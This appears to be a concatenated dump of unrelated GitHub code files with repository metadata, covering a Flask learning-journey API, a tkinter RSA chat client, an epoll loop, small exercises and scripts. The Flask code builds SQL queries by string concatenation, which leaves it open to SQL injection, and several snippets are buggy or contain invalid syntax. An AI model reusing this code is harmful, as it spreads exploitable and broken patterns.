get_active_skill(skillsId):\n skillsIdQuery = \"(\"\n for item in skillsId:\n skillsIdQuery += str(item[0]) + \",\"\n skillsIdQuery = skillsIdQuery[:-1]\n skillsIdQuery += \")\"\n query = \"SELECT * FROM Skill WHERE status = 1 and skill_id in\" + str(skillsIdQuery)\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to GET active skill details for a specified list of skills ID\n\n# [START] Function to GET and Return active skill details for a specified list of skills ID in jsonify\n@ljManagementFunctions.route(\"/view_active_skills/\")\ndef view_active_skills(ljRole_Id):\n # get relevant skills ID matched with roleId\n skillsId = get_skills_id(ljRole_Id)\n \n # get skills that match skills id retrieved earlier and are active \n skills = get_active_skill(skillsId)\n return jsonify(\n {\n \"data\": skills\n }\n ), 200\n# [END] Function to GET and Return active skill details for a specified list of skills ID in 
jsonify\n\n# [START] Function to GET newly created learning journey ID\ndef getLjId():\n query = \"SELECT MAX(ljourney_id) FROM LearningJourney\"\n cursor.execute(query)\n data = cursor.fetchall()\n id = data[0][0]\n return id\n# [END] Function to GET newly created learning journey ID\n\n# [START] Function to CREATE new learning journey \n@ljManagementFunctions.route(\"/create_lj\", methods=[\"POST\"])\ndef create_lj():\n # check for missing inputs\n data = request.get_json()\n if not all(key in data.keys() for\n key in ('staffId', 'selectedRole', 'selectedCourses')):\n return jsonify({\n \"message\": \"Incorrect JSON object provided.\"\n }), 500\n \n # if form validation succesful\n try:\n staffId = data['staffId']\n selectedRole = data['selectedRole']\n query = \"INSERT INTO LearningJourney (staff_id, ljrole_id, completion_status) VALUES (%s, %s, %s);\"\n\n lj_data = (staffId, selectedRole[0], 'Incomplete')\n cursor.execute(query, lj_data)\n db_connection.commit()\n\n # get new learning journey Id\n newLjId = getLjId()\n\n selectedCourses = data['selectedCourses']\n for course in selectedCourses:\n query2 = \"INSERT INTO LJ_Course VALUES (%s, %s)\"\n course_data = (newLjId, course[0])\n cursor.execute(query2, course_data)\n db_connection.commit()\n\n return \"success\"\n\n except Exception:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to CREATE new learning journey \n\n# --------- Staff Learning Journey Creation Functions ---------\n# --------------------------- End -----------------------------\n\n\n# ---------- Staff View ALL Learning Journey Functions ----------\n# --------------------------- Start ---------------------------\n\n# [START] Function to get role name for a specific role ID\ndef get_role_name(roleId):\n query = \"SELECT ljrole_name FROM LJRole WHERE ljrole_id =\" + str(roleId)\n cursor.execute(query)\n ljRoleName = cursor.fetchall()\n ljRoleName = ljRoleName[0][0]\n return ljRoleName\n# [END] Function to get role name for a specific role ID\n\n# [START] Function to view ALL learning journey for a specific staff\n@ljManagementFunctions.route(\"/view_AllLj/\")\ndef get_all_lj(staffId):\n lj_list = get_all_staff_lj(staffId)\n lj_descriptive_list = []\n for lj in lj_list:\n # get ljid\n ljourney_id = lj[0]\n \n data = []\n # get role name\n roleId = lj[2]\n ljRoleName = get_role_name(roleId)\n \n # get relevant skills ID matched with roleId\n skillsId = get_skills_id(roleId)\n\n # get skills that match skills id retrieved earlier and are active \n skills = get_active_skill(skillsId)\n skillNames=\"\"\n for skill in skills:\n if skill != skills[-1]:\n skillNames += (skill[1]) + \", \"\n else:\n skillNames += (skill[1])\n \n # get status\n status = lj[3]\n\n # append as a list to lj_descriptive_list\n data = [ljourney_id, roleId, ljRoleName, skillNames, status]\n lj_descriptive_list.append(data)\n return jsonify(\n {\n \"data\": lj_descriptive_list\n }\n ), 200\n# [END] Function to view ALL learning journey for a specific staff\n# ---------- Staff View ALL Learning Journey Functions ---------\n# --------------------------- End ---------------------------\n\n\n\n# ------- Staff View Learning Journey Details Functions --------\n# --------------------------- Start ---------------------------\n\n# [START] Function to get learning journey courses ID in a specific learning journey\ndef get_lj_courses_id(ljourney_id):\n query = \"SELECT course_id FROM LJ_Course WHERE ljourney_id = \" + str(ljourney_id)\n cursor.execute(query)\n 
ljCourseIdList= cursor.fetchall()\n return ljCourseIdList\n# [END] Function to get learning journey courses ID in a specific learning journey\n\n# [START] Function to course details based on a specific course ID\ndef get_course_details(courseId):\n query = \"SELECT * from Course WHERE course_status='Active' AND course_id='\" + str(courseId) + \"'\"\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to course details based on a specific course ID\n\n# [START] Function to get course registration details for a specific staff ID\ndef get_course_registration_by_staffId(staffId, courseId):\n query = \"SELECT course_id, reg_status, completion_status FROM Registration WHERE staff_id=\" + str(staffId) + \" AND course_id='\" + str(courseId) + \"'\"\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to get course registration details for a specific staff ID\n\n# [START] Function to GET courses ID bsed on a specific skill ID\ndef get_course_by_skillId(skillId):\n query = \"SELECT course_id FROM Course_Skill WHERE skill_id=\" + str(skillId)\n cursor.execute(query)\n return cursor.fetchall() \n# [END] Function to GET courses ID based on a specific skill ID\n\n# [START] Function to GET all details (ljourneyId, roleName, skillId, skillName, courseId, courseName, courseDetails) of a specific learning journey ID\n@ljManagementFunctions.route(\"/view_LjDetails/\")\ndef view_LjDetails(ljourney_id):\n ljDetails = get_lj_details(ljourney_id)\n \n roleId = ljDetails[0][2]\n roleName= get_role_name(roleId)\n \n skillsId = get_skills_id(roleId)\n skills = get_active_skill(skillsId)\n skillList = []\n\n # creating skillList where format = [[skillId, skill 1, (acquired/unacquired)], [chosen course names, (completed/ongoing/registered/waitlist/not registered)]]\n for skill in skills:\n skillCourseDetails = []\n courseList = []\n skillId = skill[0]\n \n # get courses under skill ID\n courses_in_skill = get_course_by_skillId(skillId)\n skillAcquired = False\n \n # check if course chosen\n for course in courses_in_skill:\n if course in get_lj_courses_id(ljourney_id):\n courseDetails = (get_course_details(course[0]))\n courseId = courseDetails[0][0]\n courseName = courseDetails[0][1]\n \n # check course status and registration\n # get staffid\n staffId = get_lj_details(ljourney_id)\n staffId = str(staffId[0][1])\n\n # get course status and registration\n courseStatusDetails = get_course_registration_by_staffId(staffId, courseId)\n \n # extract actual status\n if courseStatusDetails == []:\n courseStatus = \"Register Now\"\n else:\n if courseStatusDetails[0][2] == '':\n courseStatus = courseStatusDetails[0][1]\n else:\n courseStatus = courseStatusDetails[0][2]\n\n # match skill acquired with status\n if courseStatus == \"Completed\":\n skillAcquired = True\n courseList.append([courseId, courseName, courseStatus])\n \n skillCourseDetails = [[skillId, skill[1], skillAcquired], courseList]\n skillList.append(skillCourseDetails)\n \n status = ljDetails[0][3]\n result = [ljourney_id, roleName, skillList, status]\n return jsonify(\n {\n \"data\": result\n }\n ), 200\n# [END] Function to GET all details (ljourneyId, roleName, skillId, skillName, courseId, courseName, courseDetails) of a specific learning journey ID\n\n# [START] Function to DELETE a learning journey based on learning journey ID\n@ljManagementFunctions.route(\"/deleteLearningJourney/\", methods=[\"DELETE\"])\ndef deleteLearningJourney(selectedLj):\n if (request.method == 'DELETE'):\n # delete from ljcourse table\n query2 = 
\"DELETE FROM LJ_Course WHERE ljourney_id =\" + str(selectedLj)\n cursor.execute(query2)\n db_connection.commit()\n\n # delete from learningjourney table\n query = \"DELETE FROM LearningJourney WHERE ljourney_id =\" + str(selectedLj)\n cursor.execute(query)\n db_connection.commit()\n \n return \"success\"\n\n else:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to DELETE a learning journey based on learning journey ID\n\n# ------- Staff View Learning Journey Details Functions --------\n# ---------------------------- End -----------------------------\n\n\n# -------- Staff Add Learning Journey Courses Functions ---------\n# ---------------------------- End -----------------------------\n# [START] Function to GET learning journey based on a specific learning journey ID\ndef get_lj_details(ljourney_id):\n query = \"SELECT * FROM LearningJourney WHERE ljourney_id =\" + str(ljourney_id)\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to GET learning journey based on a specific learning journey ID\n\n# [START] Function to GET relevant courses that has not been added to a selected learning journey \n@ljManagementFunctions.route(\"/viewCoursesToAdd/\")\ndef viewCoursesToAdd(ljourney_id):\n ljDetails = get_lj_details(ljourney_id)\n \n roleId = ljDetails[0][2]\n roleName= get_role_name(roleId)\n \n skillsId = get_skills_id(roleId)\n skills = get_active_skill(skillsId)\n print(skills)\n skillList = []\n\n # creating skillList where format = [[skillId, skill 1, (acquired/unacquired)], [chosen course names, (completed/ongoing/registered/waitlist/not registered)]]\n for skill in skills:\n skillCourseDetails = []\n courseList = []\n skillId = skill[0]\n \n # get courses under skill\n courses_in_skill = get_course_by_skillId(skillId)\n \n # check if course not chosen\n for course in courses_in_skill:\n if course not in get_lj_courses_id(ljourney_id):\n courseDetails = (get_course_details(course[0]))\n \n if courseDetails != []:\n courseId = courseDetails[0][0]\n courseName = courseDetails[0][1]\n courseDesc = courseDetails[0][2]\n \n # check course status and registration\n # get staffid \n staffId = get_lj_details(ljourney_id)\n staffId = str(staffId[0][1])\n\n # get course status and registration\n courseStatusDetails = get_course_registration_by_staffId(staffId, courseId)\n # extract actual status\n if courseStatusDetails == []:\n print(courseStatusDetails)\n courseStatus = \"Incomplete\"\n else:\n print(courseStatusDetails[0][2])\n if courseStatusDetails[0][2] == '':\n courseStatus = courseStatusDetails[0][1]\n else:\n courseStatus = courseStatusDetails[0][2]\n\n courseList.append([courseId, courseName, courseStatus, courseDesc])\n \n skillCourseDetails = [[skillId, skill[1]], courseList]\n skillList.append(skillCourseDetails)\n print(skillCourseDetails)\n status = ljDetails[0][3]\n result = [ljourney_id, roleName, skillList, status]\n return jsonify(\n {\n \"data\": result\n }\n ), 200\n# [END] Function to Get relevant courses that has not been added to a selected learning journey \n\n\n# [START] Function to add courses from specific learning journey\n@ljManagementFunctions.route(\"/addCoursesToLj\", methods=[\"POST\"])\ndef addCoursesToLj():\n # check for missing inputs\n data = request.get_json()\n if not all(key in data.keys() for\n key in ('selectedLj', 'selectedCourses')):\n return jsonify({\n \"message\": \"Incorrect JSON object provided.\"\n }), 500\n \n # if form validation succesful\n try:\n selectedLj = 
data['selectedLj']\n selectedCourses = data['selectedCourses']\n for course in selectedCourses:\n query = \"INSERT INTO LJ_Course VALUES (%s, %s)\"\n course_data = (selectedLj, course)\n cursor.execute(query, course_data)\n db_connection.commit()\n return \"success\"\n\n except Exception:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to add courses from specific learning journey\n\n# -------- Staff Add Learning Journey Courses Functions ---------\n# ---------------------------- End -----------------------------\n\n\n# ------ Staff Remove Learning Journey Courses Functions -------\n# --------------------------- Start -----------------------------\n\n# [START] Function to remove courses from specific learning journey\n@ljManagementFunctions.route(\"/removeCoursesFromLj\", methods=[\"POST\"])\ndef removeCoursesFromLj():\n # check for missing inputs\n data = request.get_json()\n \n if not all(key in data.keys() for\n key in ('selectedLj', 'selectedCourses')):\n return jsonify({\n \"message\": \"Incorrect JSON object provided.\"\n }), 500\n \n # if form validation succesful\n try:\n selectedLj = data['selectedLj']\n selectedCourses = data['selectedCourses']\n for course in selectedCourses:\n query = \"DELETE FROM LJ_Course WHERE ljourney_id = (%s) AND course_id= (%s)\"\n course_data = (selectedLj, course)\n cursor.execute(query, course_data)\n db_connection.commit()\n return \"course deletion success\"\n\n except Exception:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to remove courses from specific learning journey\n\n# ------ Staff Remove Learning Journey Courses Functions -------\n# ---------------------------- End ------------------------------","repo_name":"Kodajak/SPM_G4T2","sub_path":"flask/ljManagementFunctions/ljManagementFunctions.py","file_name":"ljManagementFunctions.py","file_ext":"py","file_size_in_byte":19812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73912842384","text":"dic1={1:10, 2:20}\n\ndic2={3:30, 4:40}\n\ndic3={5:50,6:60}\n \n# | - pipe symbol to merge two or more dictionaries \n\ndic4 = dic1 | dic2 | dic3\n\nprint(\"Merged Dictionary: \", dic4)\n","repo_name":"bhattaditya/Python-Practise","sub_path":"Dictionary/concatinate.py","file_name":"concatinate.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27335810752","text":"def Iccanobif(x):\n list = [1]\n r = 1\n for i in range(x-1):\n list.append(r)\n r = r + list[i]\n\n return list[::-1]\n\n\nx = int(input())\nlist = \" \".join(map(str, Iccanobif(x)))\nprint(list)","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/Iccanobif.py","file_name":"Iccanobif.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3038587585","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\nimport os\nimport socket\nimport errno\nimport select\nimport logging\nimport traceback\n\n\n__all__ = ['EventLoop', 'EPOLL_NULL', 'EPOLL_IN',\n 'EPOLL_OUT', 'EPOLL_ERR', 'EPOLL_HUP', 'EVENT_NAMES']\n\n\nEPOLL_NULL = 0x00\nEPOLL_IN = select.EPOLLIN\nEPOLL_OUT = select.EPOLLOUT\nEPOLL_ERR = select.EPOLLERR\nEPOLL_HUP = select.EPOLLHUP\n\n\nEVENT_NAMES = {\n EPOLL_NULL: 'EPOLL_NULL',\n EPOLL_IN: 'EPOLL_IN',\n EPOLL_OUT: 'EPOLL_OUT',\n EPOLL_ERR: 'EPOLL_ERR',\n EPOLL_HUP: 
'EPOLL_HUP',\n}\n\n\n\nclass EpollLoop(object):\n    '''using epoll event loop'''\n\n    def __init__(self):\n        self._epoll = select.epoll()\n\n    def poll(self, timeout):\n        return self._epoll.poll(timeout)\n\n    def add_fd(self, fd, mode):\n        self._epoll.register(fd, mode)\n\n    def remove_fd(self, fd):\n        self._epoll.unregister(fd)\n\n    def modify_fd(self, fd, mode):\n        self._epoll.modify(fd, mode)\n\n    def close(self):\n        self._epoll.close()\n\nclass EventLoop(object):\n\n    TIMEOUT=3.6\n\n    def __init__(self):\n        self._impl = EpollLoop()\n        self._fd_to_sock = {}\n        self._handlers = []\n        self.stopping = False\n\n    def poll(self, timeout=None):\n        events = self._impl.poll(timeout)\n        return [ (self._fd_to_sock[fd], fd, event) for fd, event in events]\n\n    def add(self, sock, mode):\n        fd = sock.fileno()\n        self._fd_to_sock[fd] = sock\n        self._impl.add_fd(fd, mode)\n\n    def remove(self, sock):\n        fd = sock.fileno()\n        del self._fd_to_sock[fd]\n        self._impl.remove_fd(fd)\n\n    def modify(self, sock, mode):\n        fd = sock.fileno()\n        self._impl.modify_fd(fd, mode)\n\n    def add_handler(self, handler):\n        self._handlers.append(handler)\n\n    # copied and modified from shadowsocks/eventloop.py\n    def run(self):\n        logging.info("starting eventloop...")\n        while not self.stopping:\n            try:\n                events = self.poll(self.TIMEOUT)\n            except (OSError, IOError) as e:\n                if errno_from_exception(e) == errno.EPIPE:\n                    # Happens when the client closes the connection\n                    logging.error('poll:%s', e)\n                    continue\n                else:\n                    logging.error('poll:%s', e)\n                    traceback.print_exc()\n                    continue\n            for handler in self._handlers:\n                # TODO when there are a lot of handlers\n                try:\n                    handler(events)\n                except (OSError, IOError) as e:\n                    logging.error(e)\n                    traceback.print_exc()\n\n    def close(self):\n        self.stopping = True\n        self._impl.close()\n\n\n# from tornado\ndef errno_from_exception(e):\n    """Provides the errno from an Exception object.\n\n    There are cases where the errno attribute was not set so we pull\n    the errno out of the args but if someone instantiates an Exception\n    without any args you will get a tuple error. So this function\n    abstracts all that behavior to give you a safe way to get the\n    errno.\n    """\n\n    if hasattr(e, 'errno'):\n        return e.errno\n    elif e.args:\n        return e.args[0]\n    else:\n        return None\n\n\n# from tornado\ndef get_sock_error(sock):\n    error_number = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)\n    return socket.error(error_number, os.strerror(error_number))\n\n","repo_name":"junfenglx/sockchat","sub_path":"eventloop.py","file_name":"eventloop.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39828660270","text":"print("Welcome! This is my very first python project and calculator. 
I hope you enjoy!\")\r\nprint(\"Please type in: Add, Subtract, Multiply, Divide\")\r\ninstruction = str(input(\"Your choice: \"))\r\nif instruction == \"Add\" or instruction == \"add\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n add = num_1 + num_2\r\n print(\"Result: \", add)\r\nelif instruction == \"Subtract\" or instruction == \"subtract\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n subtract = num_1 - num_2\r\n print(\"Result: \", subtract)\r\nelif instruction == \"Multiply\" or instruction == \"multiply\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n multiply = num_1 * num_2\r\n print(\"Result: \", multiply)\r\nelif instruction == \"Divide\" or instruction == \"divide\":\r\n num_1 = int(input(\"Number: \"))\r\n num_2 = int(input(\"Number: \"))\r\n division_quotient = num_1 // num_2\r\n division_remainder = num_1 % num_2\r\n print(\"Quotient: \", division_quotient)\r\n print(\"Remainder: \", division_remainder)\r\nelse:\r\n print(\"Please make a correct choice.\")","repo_name":"Coder44/Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72843296147","text":"class KMP(object):\n def contains_pattern(self, string, pattern):\n string_index = 0\n pattern_index = 0\n pattern_table = build_kmp_table(pattern)\n contains = False\n while string_index < len(string):\n if string[string_index] == pattern[pattern_index]:\n pattern_index += 1\n if pattern_index == len(pattern):\n contains = True\n break\n else:\n pattern_index = pattern_table[pattern_index]\n string_index += 1\n return contains\n \n\n\n def build_kmp_table(self,pattern, print_table = False):\n j = 0\n i = 1\n table = [0 for l in pattern] \n while i < len(pattern) :\n if pattern[i] == pattern[j]:\n table[i] = j + 1\n i += 1\n j += 1\n elif j>0:\n j = table[j-1]\n else:\n table[i] = 0\n i += 1\n if print_table:\n for i in table:\n print(i, end = ' ')\n print('') \n return table\n\n\n\n","repo_name":"esmason/Bioinformatics-Python-Scripts","sub_path":"searchString/kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13734197052","text":"# #\n# #\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nn = int(input(\"Enter any integer n: \"))\n\nif n in range(1,101):\n if (n % 2 == 1):\n print(\"Weird\")\n if (n% 2 == 0):\n if n in range(2, 6):\n print(\"Not Weird\")\n if n in range(6, 21):\n print(\"Weird\")\n if n in range(21, 101):\n print(\"Not Weird\")\n\n\n\n\n\n\n\n\n\n\n\n\n# #\n# #\n# #\n# #\n# #\n# #\n# #\n# def is_leap(year):\n# leap = False\n#\n# year = int(input(i))\n#\n# i= (range(1900, (10 ** 5) + 1)\n# if (i % 100 == 0):\n# if (i % 400 == 0):\n# print(True)\n# else:\n# print(False)\n# elif (i % 4 == 0):\n# print(True)\n# else:\n# print(False)\n#\n#\n#\n# print(is_leap(year))\nimport calendar\n\nmonth=int(input(\" \"))\ndate=int(input(\" \"))\nyear=int(input(' '))\ncalendar.weekday(year,month,day)\n\n\nprint(weekday(day))","repo_name":"ajayp1717/Python-Projects","sub_path":"Python Practice/Hackerank problem.py","file_name":"Hackerank problem.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13404314135","text":"__author__ = 
'Rui'\n\nif __name__ == '__main__':\n    from redis import Redis\n    from rq_scheduler import Scheduler\n    from datetime import datetime\n    import data_collector\n    import settings.config as config\n\n    scheduler = Scheduler(connection=Redis())\n    scheduler.schedule(\n        scheduled_time=datetime.now(), # Time for first execution, in UTC timezone\n        func=data_collector.get_line_status,\n        args=[config.ACTIVE_BACKEND],\n        kwargs={}, # Keyword arguments passed into function when executed\n        interval=120, # Time before the function is called again, in seconds\n        repeat=None, # Repeat this number of times (None means repeat forever)\n        result_ttl=0 # How long to keep the job result, in seconds\n    )\n\n","repo_name":"ruiminde/TubeService","sub_path":"task_schedule.py","file_name":"task_schedule.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"32223258301","text":"import tkinter as tk\nfrom tkinter import ttk\nimport threading\nimport socket as s\nimport os\nfrom cryptage import RSAEncryption\nimport pickle as pck\nimport tqdm\nimport re\nfrom cryptography.fernet import Fernet\nimport time\nimport numpy as np\nclass Widget:\n    def addInput(self,side=\"top\", **kwargs):\n        _ = tk.Entry(self, **kwargs)\n        _.pack(side=side)\n        return _\n\n    def addbtn(self,side=\"top\", **kwargs):\n        _ = ttk.Button(self, **kwargs)\n        _.pack(side=side)\n        return _\n\n    def addLabel(self,side=\"top\",**kwargs):\n        _ = tk.Label(self,**kwargs)\n        _.pack(side=side)\n        return _\n    \n    def addFileInput(self, side=\"top\", **kwargs):\n        _ = tk.Message(self, **kwargs)\n        _.pack(side=side)\n        return _\n    \n    def addListBox(self, side=\"top\", **kwargs):\n        _ = tk.Listbox(self, **kwargs)\n        return _\n\n    def addComboBox(self,_list=[],**kwargs):\n        l = ttk.Combobox(self,values=_list, **kwargs)\n        l.pack()\n        return l\n\nclass App(tk.Tk,Widget):\n    client = s.socket()\n    SEPARATOR = \"\"\n    BUFFERSIZE = 2048\n    def __init__(self): \n        tk.Tk.__init__(self)\n        frame = tk.Frame(self)\n        frame.pack()\n        self.zone = self.addLabel(side='top')\n\n        self.frame = frame\n\n        self.message = list()\n\n        self.addLabel(\n            text=\"message\"\n        ).place(x=100,y=0)\n\n        self.addLabel(\n            text=\"Destinataire\"\n        ).place(x=100,y=110)\n\n        self.addLabel(\n            text=\"Liste des clients connecter\"\n        ).place(x=190,y=190)\n\n        self.listbox = self.addListBox(height=5,width=80)\n        self.listbox.place(x=10, y=20)\n\n        self.listuser = self.addListBox(height=3,width=80)\n        self.listuser.place(x=10, y=130)\n\n        self.listclient = list()\n\n        self.combobox = self.addComboBox(width=60,_list=[])\n        self.combobox.place(x=60,y=210)\n        self.addbtn(text=\"ajouter\",width=62,\n            command= self.ajouter\n        ).place(\n            x=60,y=235\n        )\n        self.addbtn(text=\"effacer\",width=62,\n            command= self.effacer\n        ).place(\n            x=60,y=260\n        )\n        self._listuser= list()\n        self.key = dict()\n        self.text = self.addLabel(text=\"\",side=\"bottom\")\n\n    def ajouter(self):\n        val = self.combobox.get()\n        if val != \"\":\n            self.listuser.insert(tk.END, val)\n            self._listuser.append(val)\n\n    def effacer(self):\n        self.listuser.delete(first=0, last=len(self._listuser)-1)\n        self._listuser = []\n\n    def _send(self,data):\n        self.client.send(data)\n    \n    def connect(self,host=\"localhost\",port=5555):\n        self.client.connect((host,port))\n        d, e, n = RSAEncryption._key(1024)\n        \n        self.client.send(pck.dumps(\n            ('cle',pck.dumps((d,n)))\n        ))\n        self.decryptage = RSAEncryption(use_to_encrypt=False)\n        self.decryptage.set_private_key((e,n))\n        def recvMessage():\n            while True:\n                serverMessage = 
self.client.recv(self.BUFFERSIZE)\n                decode = pck.loads(serverMessage)\n                self.message.append(decode)\n                if decode[0] == \"addr\":\n                    self.title(decode[1])\n                if decode[0] == \"listclient\":\n                    self._clients = decode[1]\n                    self.listclient=self._clients['addr']\n                    cle = self._clients['cle']\n                    for i in self.listclient:\n                        cryptage = RSAEncryption()\n                        cryptage.set_public_key(cle[i])\n                        self.key[i] = cryptage\n                    self.combobox['values'] = self.listclient\n                    msg = f\"Server: {decode[0]}\\n {decode[1]}\"\n                    self.listbox.insert(tk.END,msg)\n                    print(\"[+]\",msg)\n                \n                if decode[0] == \"message\":\n                    msg = f\"{decode[1]['from']}: {self.decryptage.decrypter(decode[1]['value'])}\"\n                    self.listbox.insert(tk.END,msg)\n                    print(\"[+]\",msg)\n\n                if decode[0] == \"filename\":\n                    filedetail = decode[1]\n                    filename = filedetail['filename']\n                    filesize = filedetail['filesize']\n                    sender = filedetail['from']\n                    cle = filedetail['cle']\n                    cle = self.decryptage.decrypter_bin(cle)\n                    fernet_decrypt = Fernet(cle)\n                    self.listbox.insert(\n                        tk.END, f\"{sender}: {filename} ({filesize}B)\")\n                    progress = range(filesize)\n                    filecr = bytes()\n                    pr = int()\n                    t0 = 0\n                    avg = list()\n                    try:\n                        for _ in progress:\n                            t0 = time.time()\n                            avg.append(t0)\n                            crypted = self.client.recv(248)\n                            pr = progress.stop\n                            if crypted.decode().__contains__(\"<\"):\n                                i = crypted.decode().index(\"<\")\n                                if crypted[:i] != b'':\n                                    byte_read = fernet_decrypt.decrypt(crypted[:i])\n                                    filecr += byte_read\n                                    t0 = time.time() - t0\n                                    avg.append(t0)\n                                    progress = range(filesize-len(byte_read))\n                                break\n                            else:\n                                byte_read = fernet_decrypt.decrypt(crypted)\n                                filecr += byte_read\n                                t0 = time.time() - t0\n                                avg.append(t0)\n                                progress = range(filesize-len(byte_read))\n                        os.chdir(\"./receive\")\n                        with open(filename,\"wb\") as f:\n                            self.text['text'] = \"Reception finished.... 
Writing in progress......\"\n                            print(self.text['text'])\n                            f.write(filecr)\n                        self.text['text'] = \"File writing finished\"\n                        print(self.text['text'])\n                    except Exception as e:\n                        print(\"Exception:\", e)\n        thread = threading.Thread(target=recvMessage)\n        thread.daemon = True\n        thread.start()\n\n\n    def send(self):\n        t = self.text.get()\n        t = ('message', t)\n        t = pck.dumps(t)\n        self._send(t)\n","repo_name":"FinaritrAndrianiaina/filetransfer","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"19913062345","text":"import json\nimport sys\nimport re\nfrom tqdm import tqdm\n\n\nif __name__ == '__main__':\n\n    filenames = [\"code-mixed-dataset/bengali/dialog-dstc2-tst.txt\",\n                 \"code-mixed-dataset/english/dialog-dstc2-tst.txt\",\n                 \"code-mixed-dataset/gujarati/dialog-dstc2-tst.txt\",\n                 \"code-mixed-dataset/hindi/dialog-dstc2-tst.txt\",\n                 \"code-mixed-dataset/tamil/dialog-dstc2-tst.txt\"\n                ]\n    \n    json_data = {\"version\":\"1.0\",\"data\":[]}\n\n    for filename in filenames:\n        with open(filename,\"r\") as fp:\n            data = fp.readlines()\n        title = filename.split(\"/\")[1]\n        lang_data = {\"title\":title,\"paragraphs\":[]}\n        context_str = \"\"\n        for line in tqdm(data):\n            if \"\\t\" in line and line != \"\\n\":\n                splits = line.strip().split(\"\\t\")\n                speakerA = \" \".join(splits[0].split(\" \")[1:]).strip()\n                speakerA = re.sub(\"\",\"[SILENCE]\",speakerA)\n                speakerB = splits[1].strip()\n                context_str += \"Speaker A: \"+speakerA+\"\\n\\nSpeaker B: \"+speakerB+\"\\n\\n\"\n            elif \"\\t\" not in line and line != \"\\n\":\n                triple = \" \".join(line.strip().split(\" \")[1:])\n                context_str += \"KB Triple: \"+triple+\"\\n\\n\"\n            elif line == \"\\n\":\n                context_dict = {\"context\":context_str}\n                lang_data[\"paragraphs\"].append(context_dict)\n                context_str = \"\"\n        json_data[\"data\"].append(lang_data)\n    \n\n    with open(\"code-mixed-dataset/test-v1.0.json\",\"w+\") as fp:\n        json.dump(json_data,fp)\n\n\n\n\n    \n    \n\n    \n    \n\n","repo_name":"sumanbanerjee1/Code-Mixed-Dialog-website","sub_path":"json_format_data.py","file_name":"json_format_data.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"16174949643","text":"# Import unpack from parent directory\nimport sys\nimport os\n\ncurrent = os.path.dirname(os.path.realpath(__file__))\nparent_directory = os.path.dirname(current)\nsys.path.append(parent_directory)\n\nimport unpack\nfrom unpack import CityNetwork\n\nimport random\nimport time\n\n@unpack.timer_decorator\ndef main():\n    # LOAD THE NETWORK (SIMILAR TO BEFORE)\n    name = 'Delft_center_walk'\n    data_folder = 'data/'\n    vehicle_type = 'walk' # walk, bike, drive, all (See osmnx documentation)\n\n    # Give a name, to avoid overwriting your plots\n    session_name = input(\"Please insert a name for this multiplot session: \")\n\n    ''' --- GENERATE NETWORK ---\n    Generate a new network using the functions in the CityNetwork class. If a network has already been generated and stored in the data folder, comment this part and continue with PREPARE NETWORK. 
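The graph generated here is pickled via City.save_graph() and reloaded further down in this script with CityNetwork.load_graph(). 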
'''\n coordinates = [52.018347, 52.005217, 4.369142, 4.350504]\n \n # Initialize CityNetwork object [N, S, E, W]\n City = CityNetwork(name, coordinates, vehicle_type)\n \n # Load osm from local or online file\n City.load_osm_graph(data_folder + name + '.osm')\n City.load_building_addr(data_folder + name + '_building_addresses.csv', \n data_folder + name + '_buildings.csv', \n data_folder + name + '_addresses.csv',\n data_folder +'runtime/'+ name + '_cbs.xml')\n \n print(City.building_addr_df)\n\n # Add speeds, lengths and distances to graph\n # Overwrite speed by using overwrite_bike=16\n # Further types available: overwrite_walk and overwrite_epv\n City.add_rel_attributes(overwrite_bike=16, overwrite_walk=5)\n\n # Add an experience attribute to the graph, inputs are\n # edges: list with edges to overwrite\n # factors: list of factors between 0 and float(inf), lower is better\n\n # Project graph\n City.project_graph()\n\n ''' EXAMPLE HIGHLIGHTS WITH EXPERIENCE\n Assign bonus or penalty to the Oude Delft \n > 1 is bonus\n < 1 is penalty\n\n Function takes as input: name/coordinate_tuple, factor\n City.add_street_experience(['Oude Delft'], [10])\n OR\n City.add_coord_experience([(latitude, longitude)], [10])\n '''\n\n # Plot the CityNetwork\n # City.plot()\n\n # Calculate dataframes of nodes and edges\n City.convert_graph_edges_to_df()\n City.convert_graph_nodes_to_df()\n\n # Save 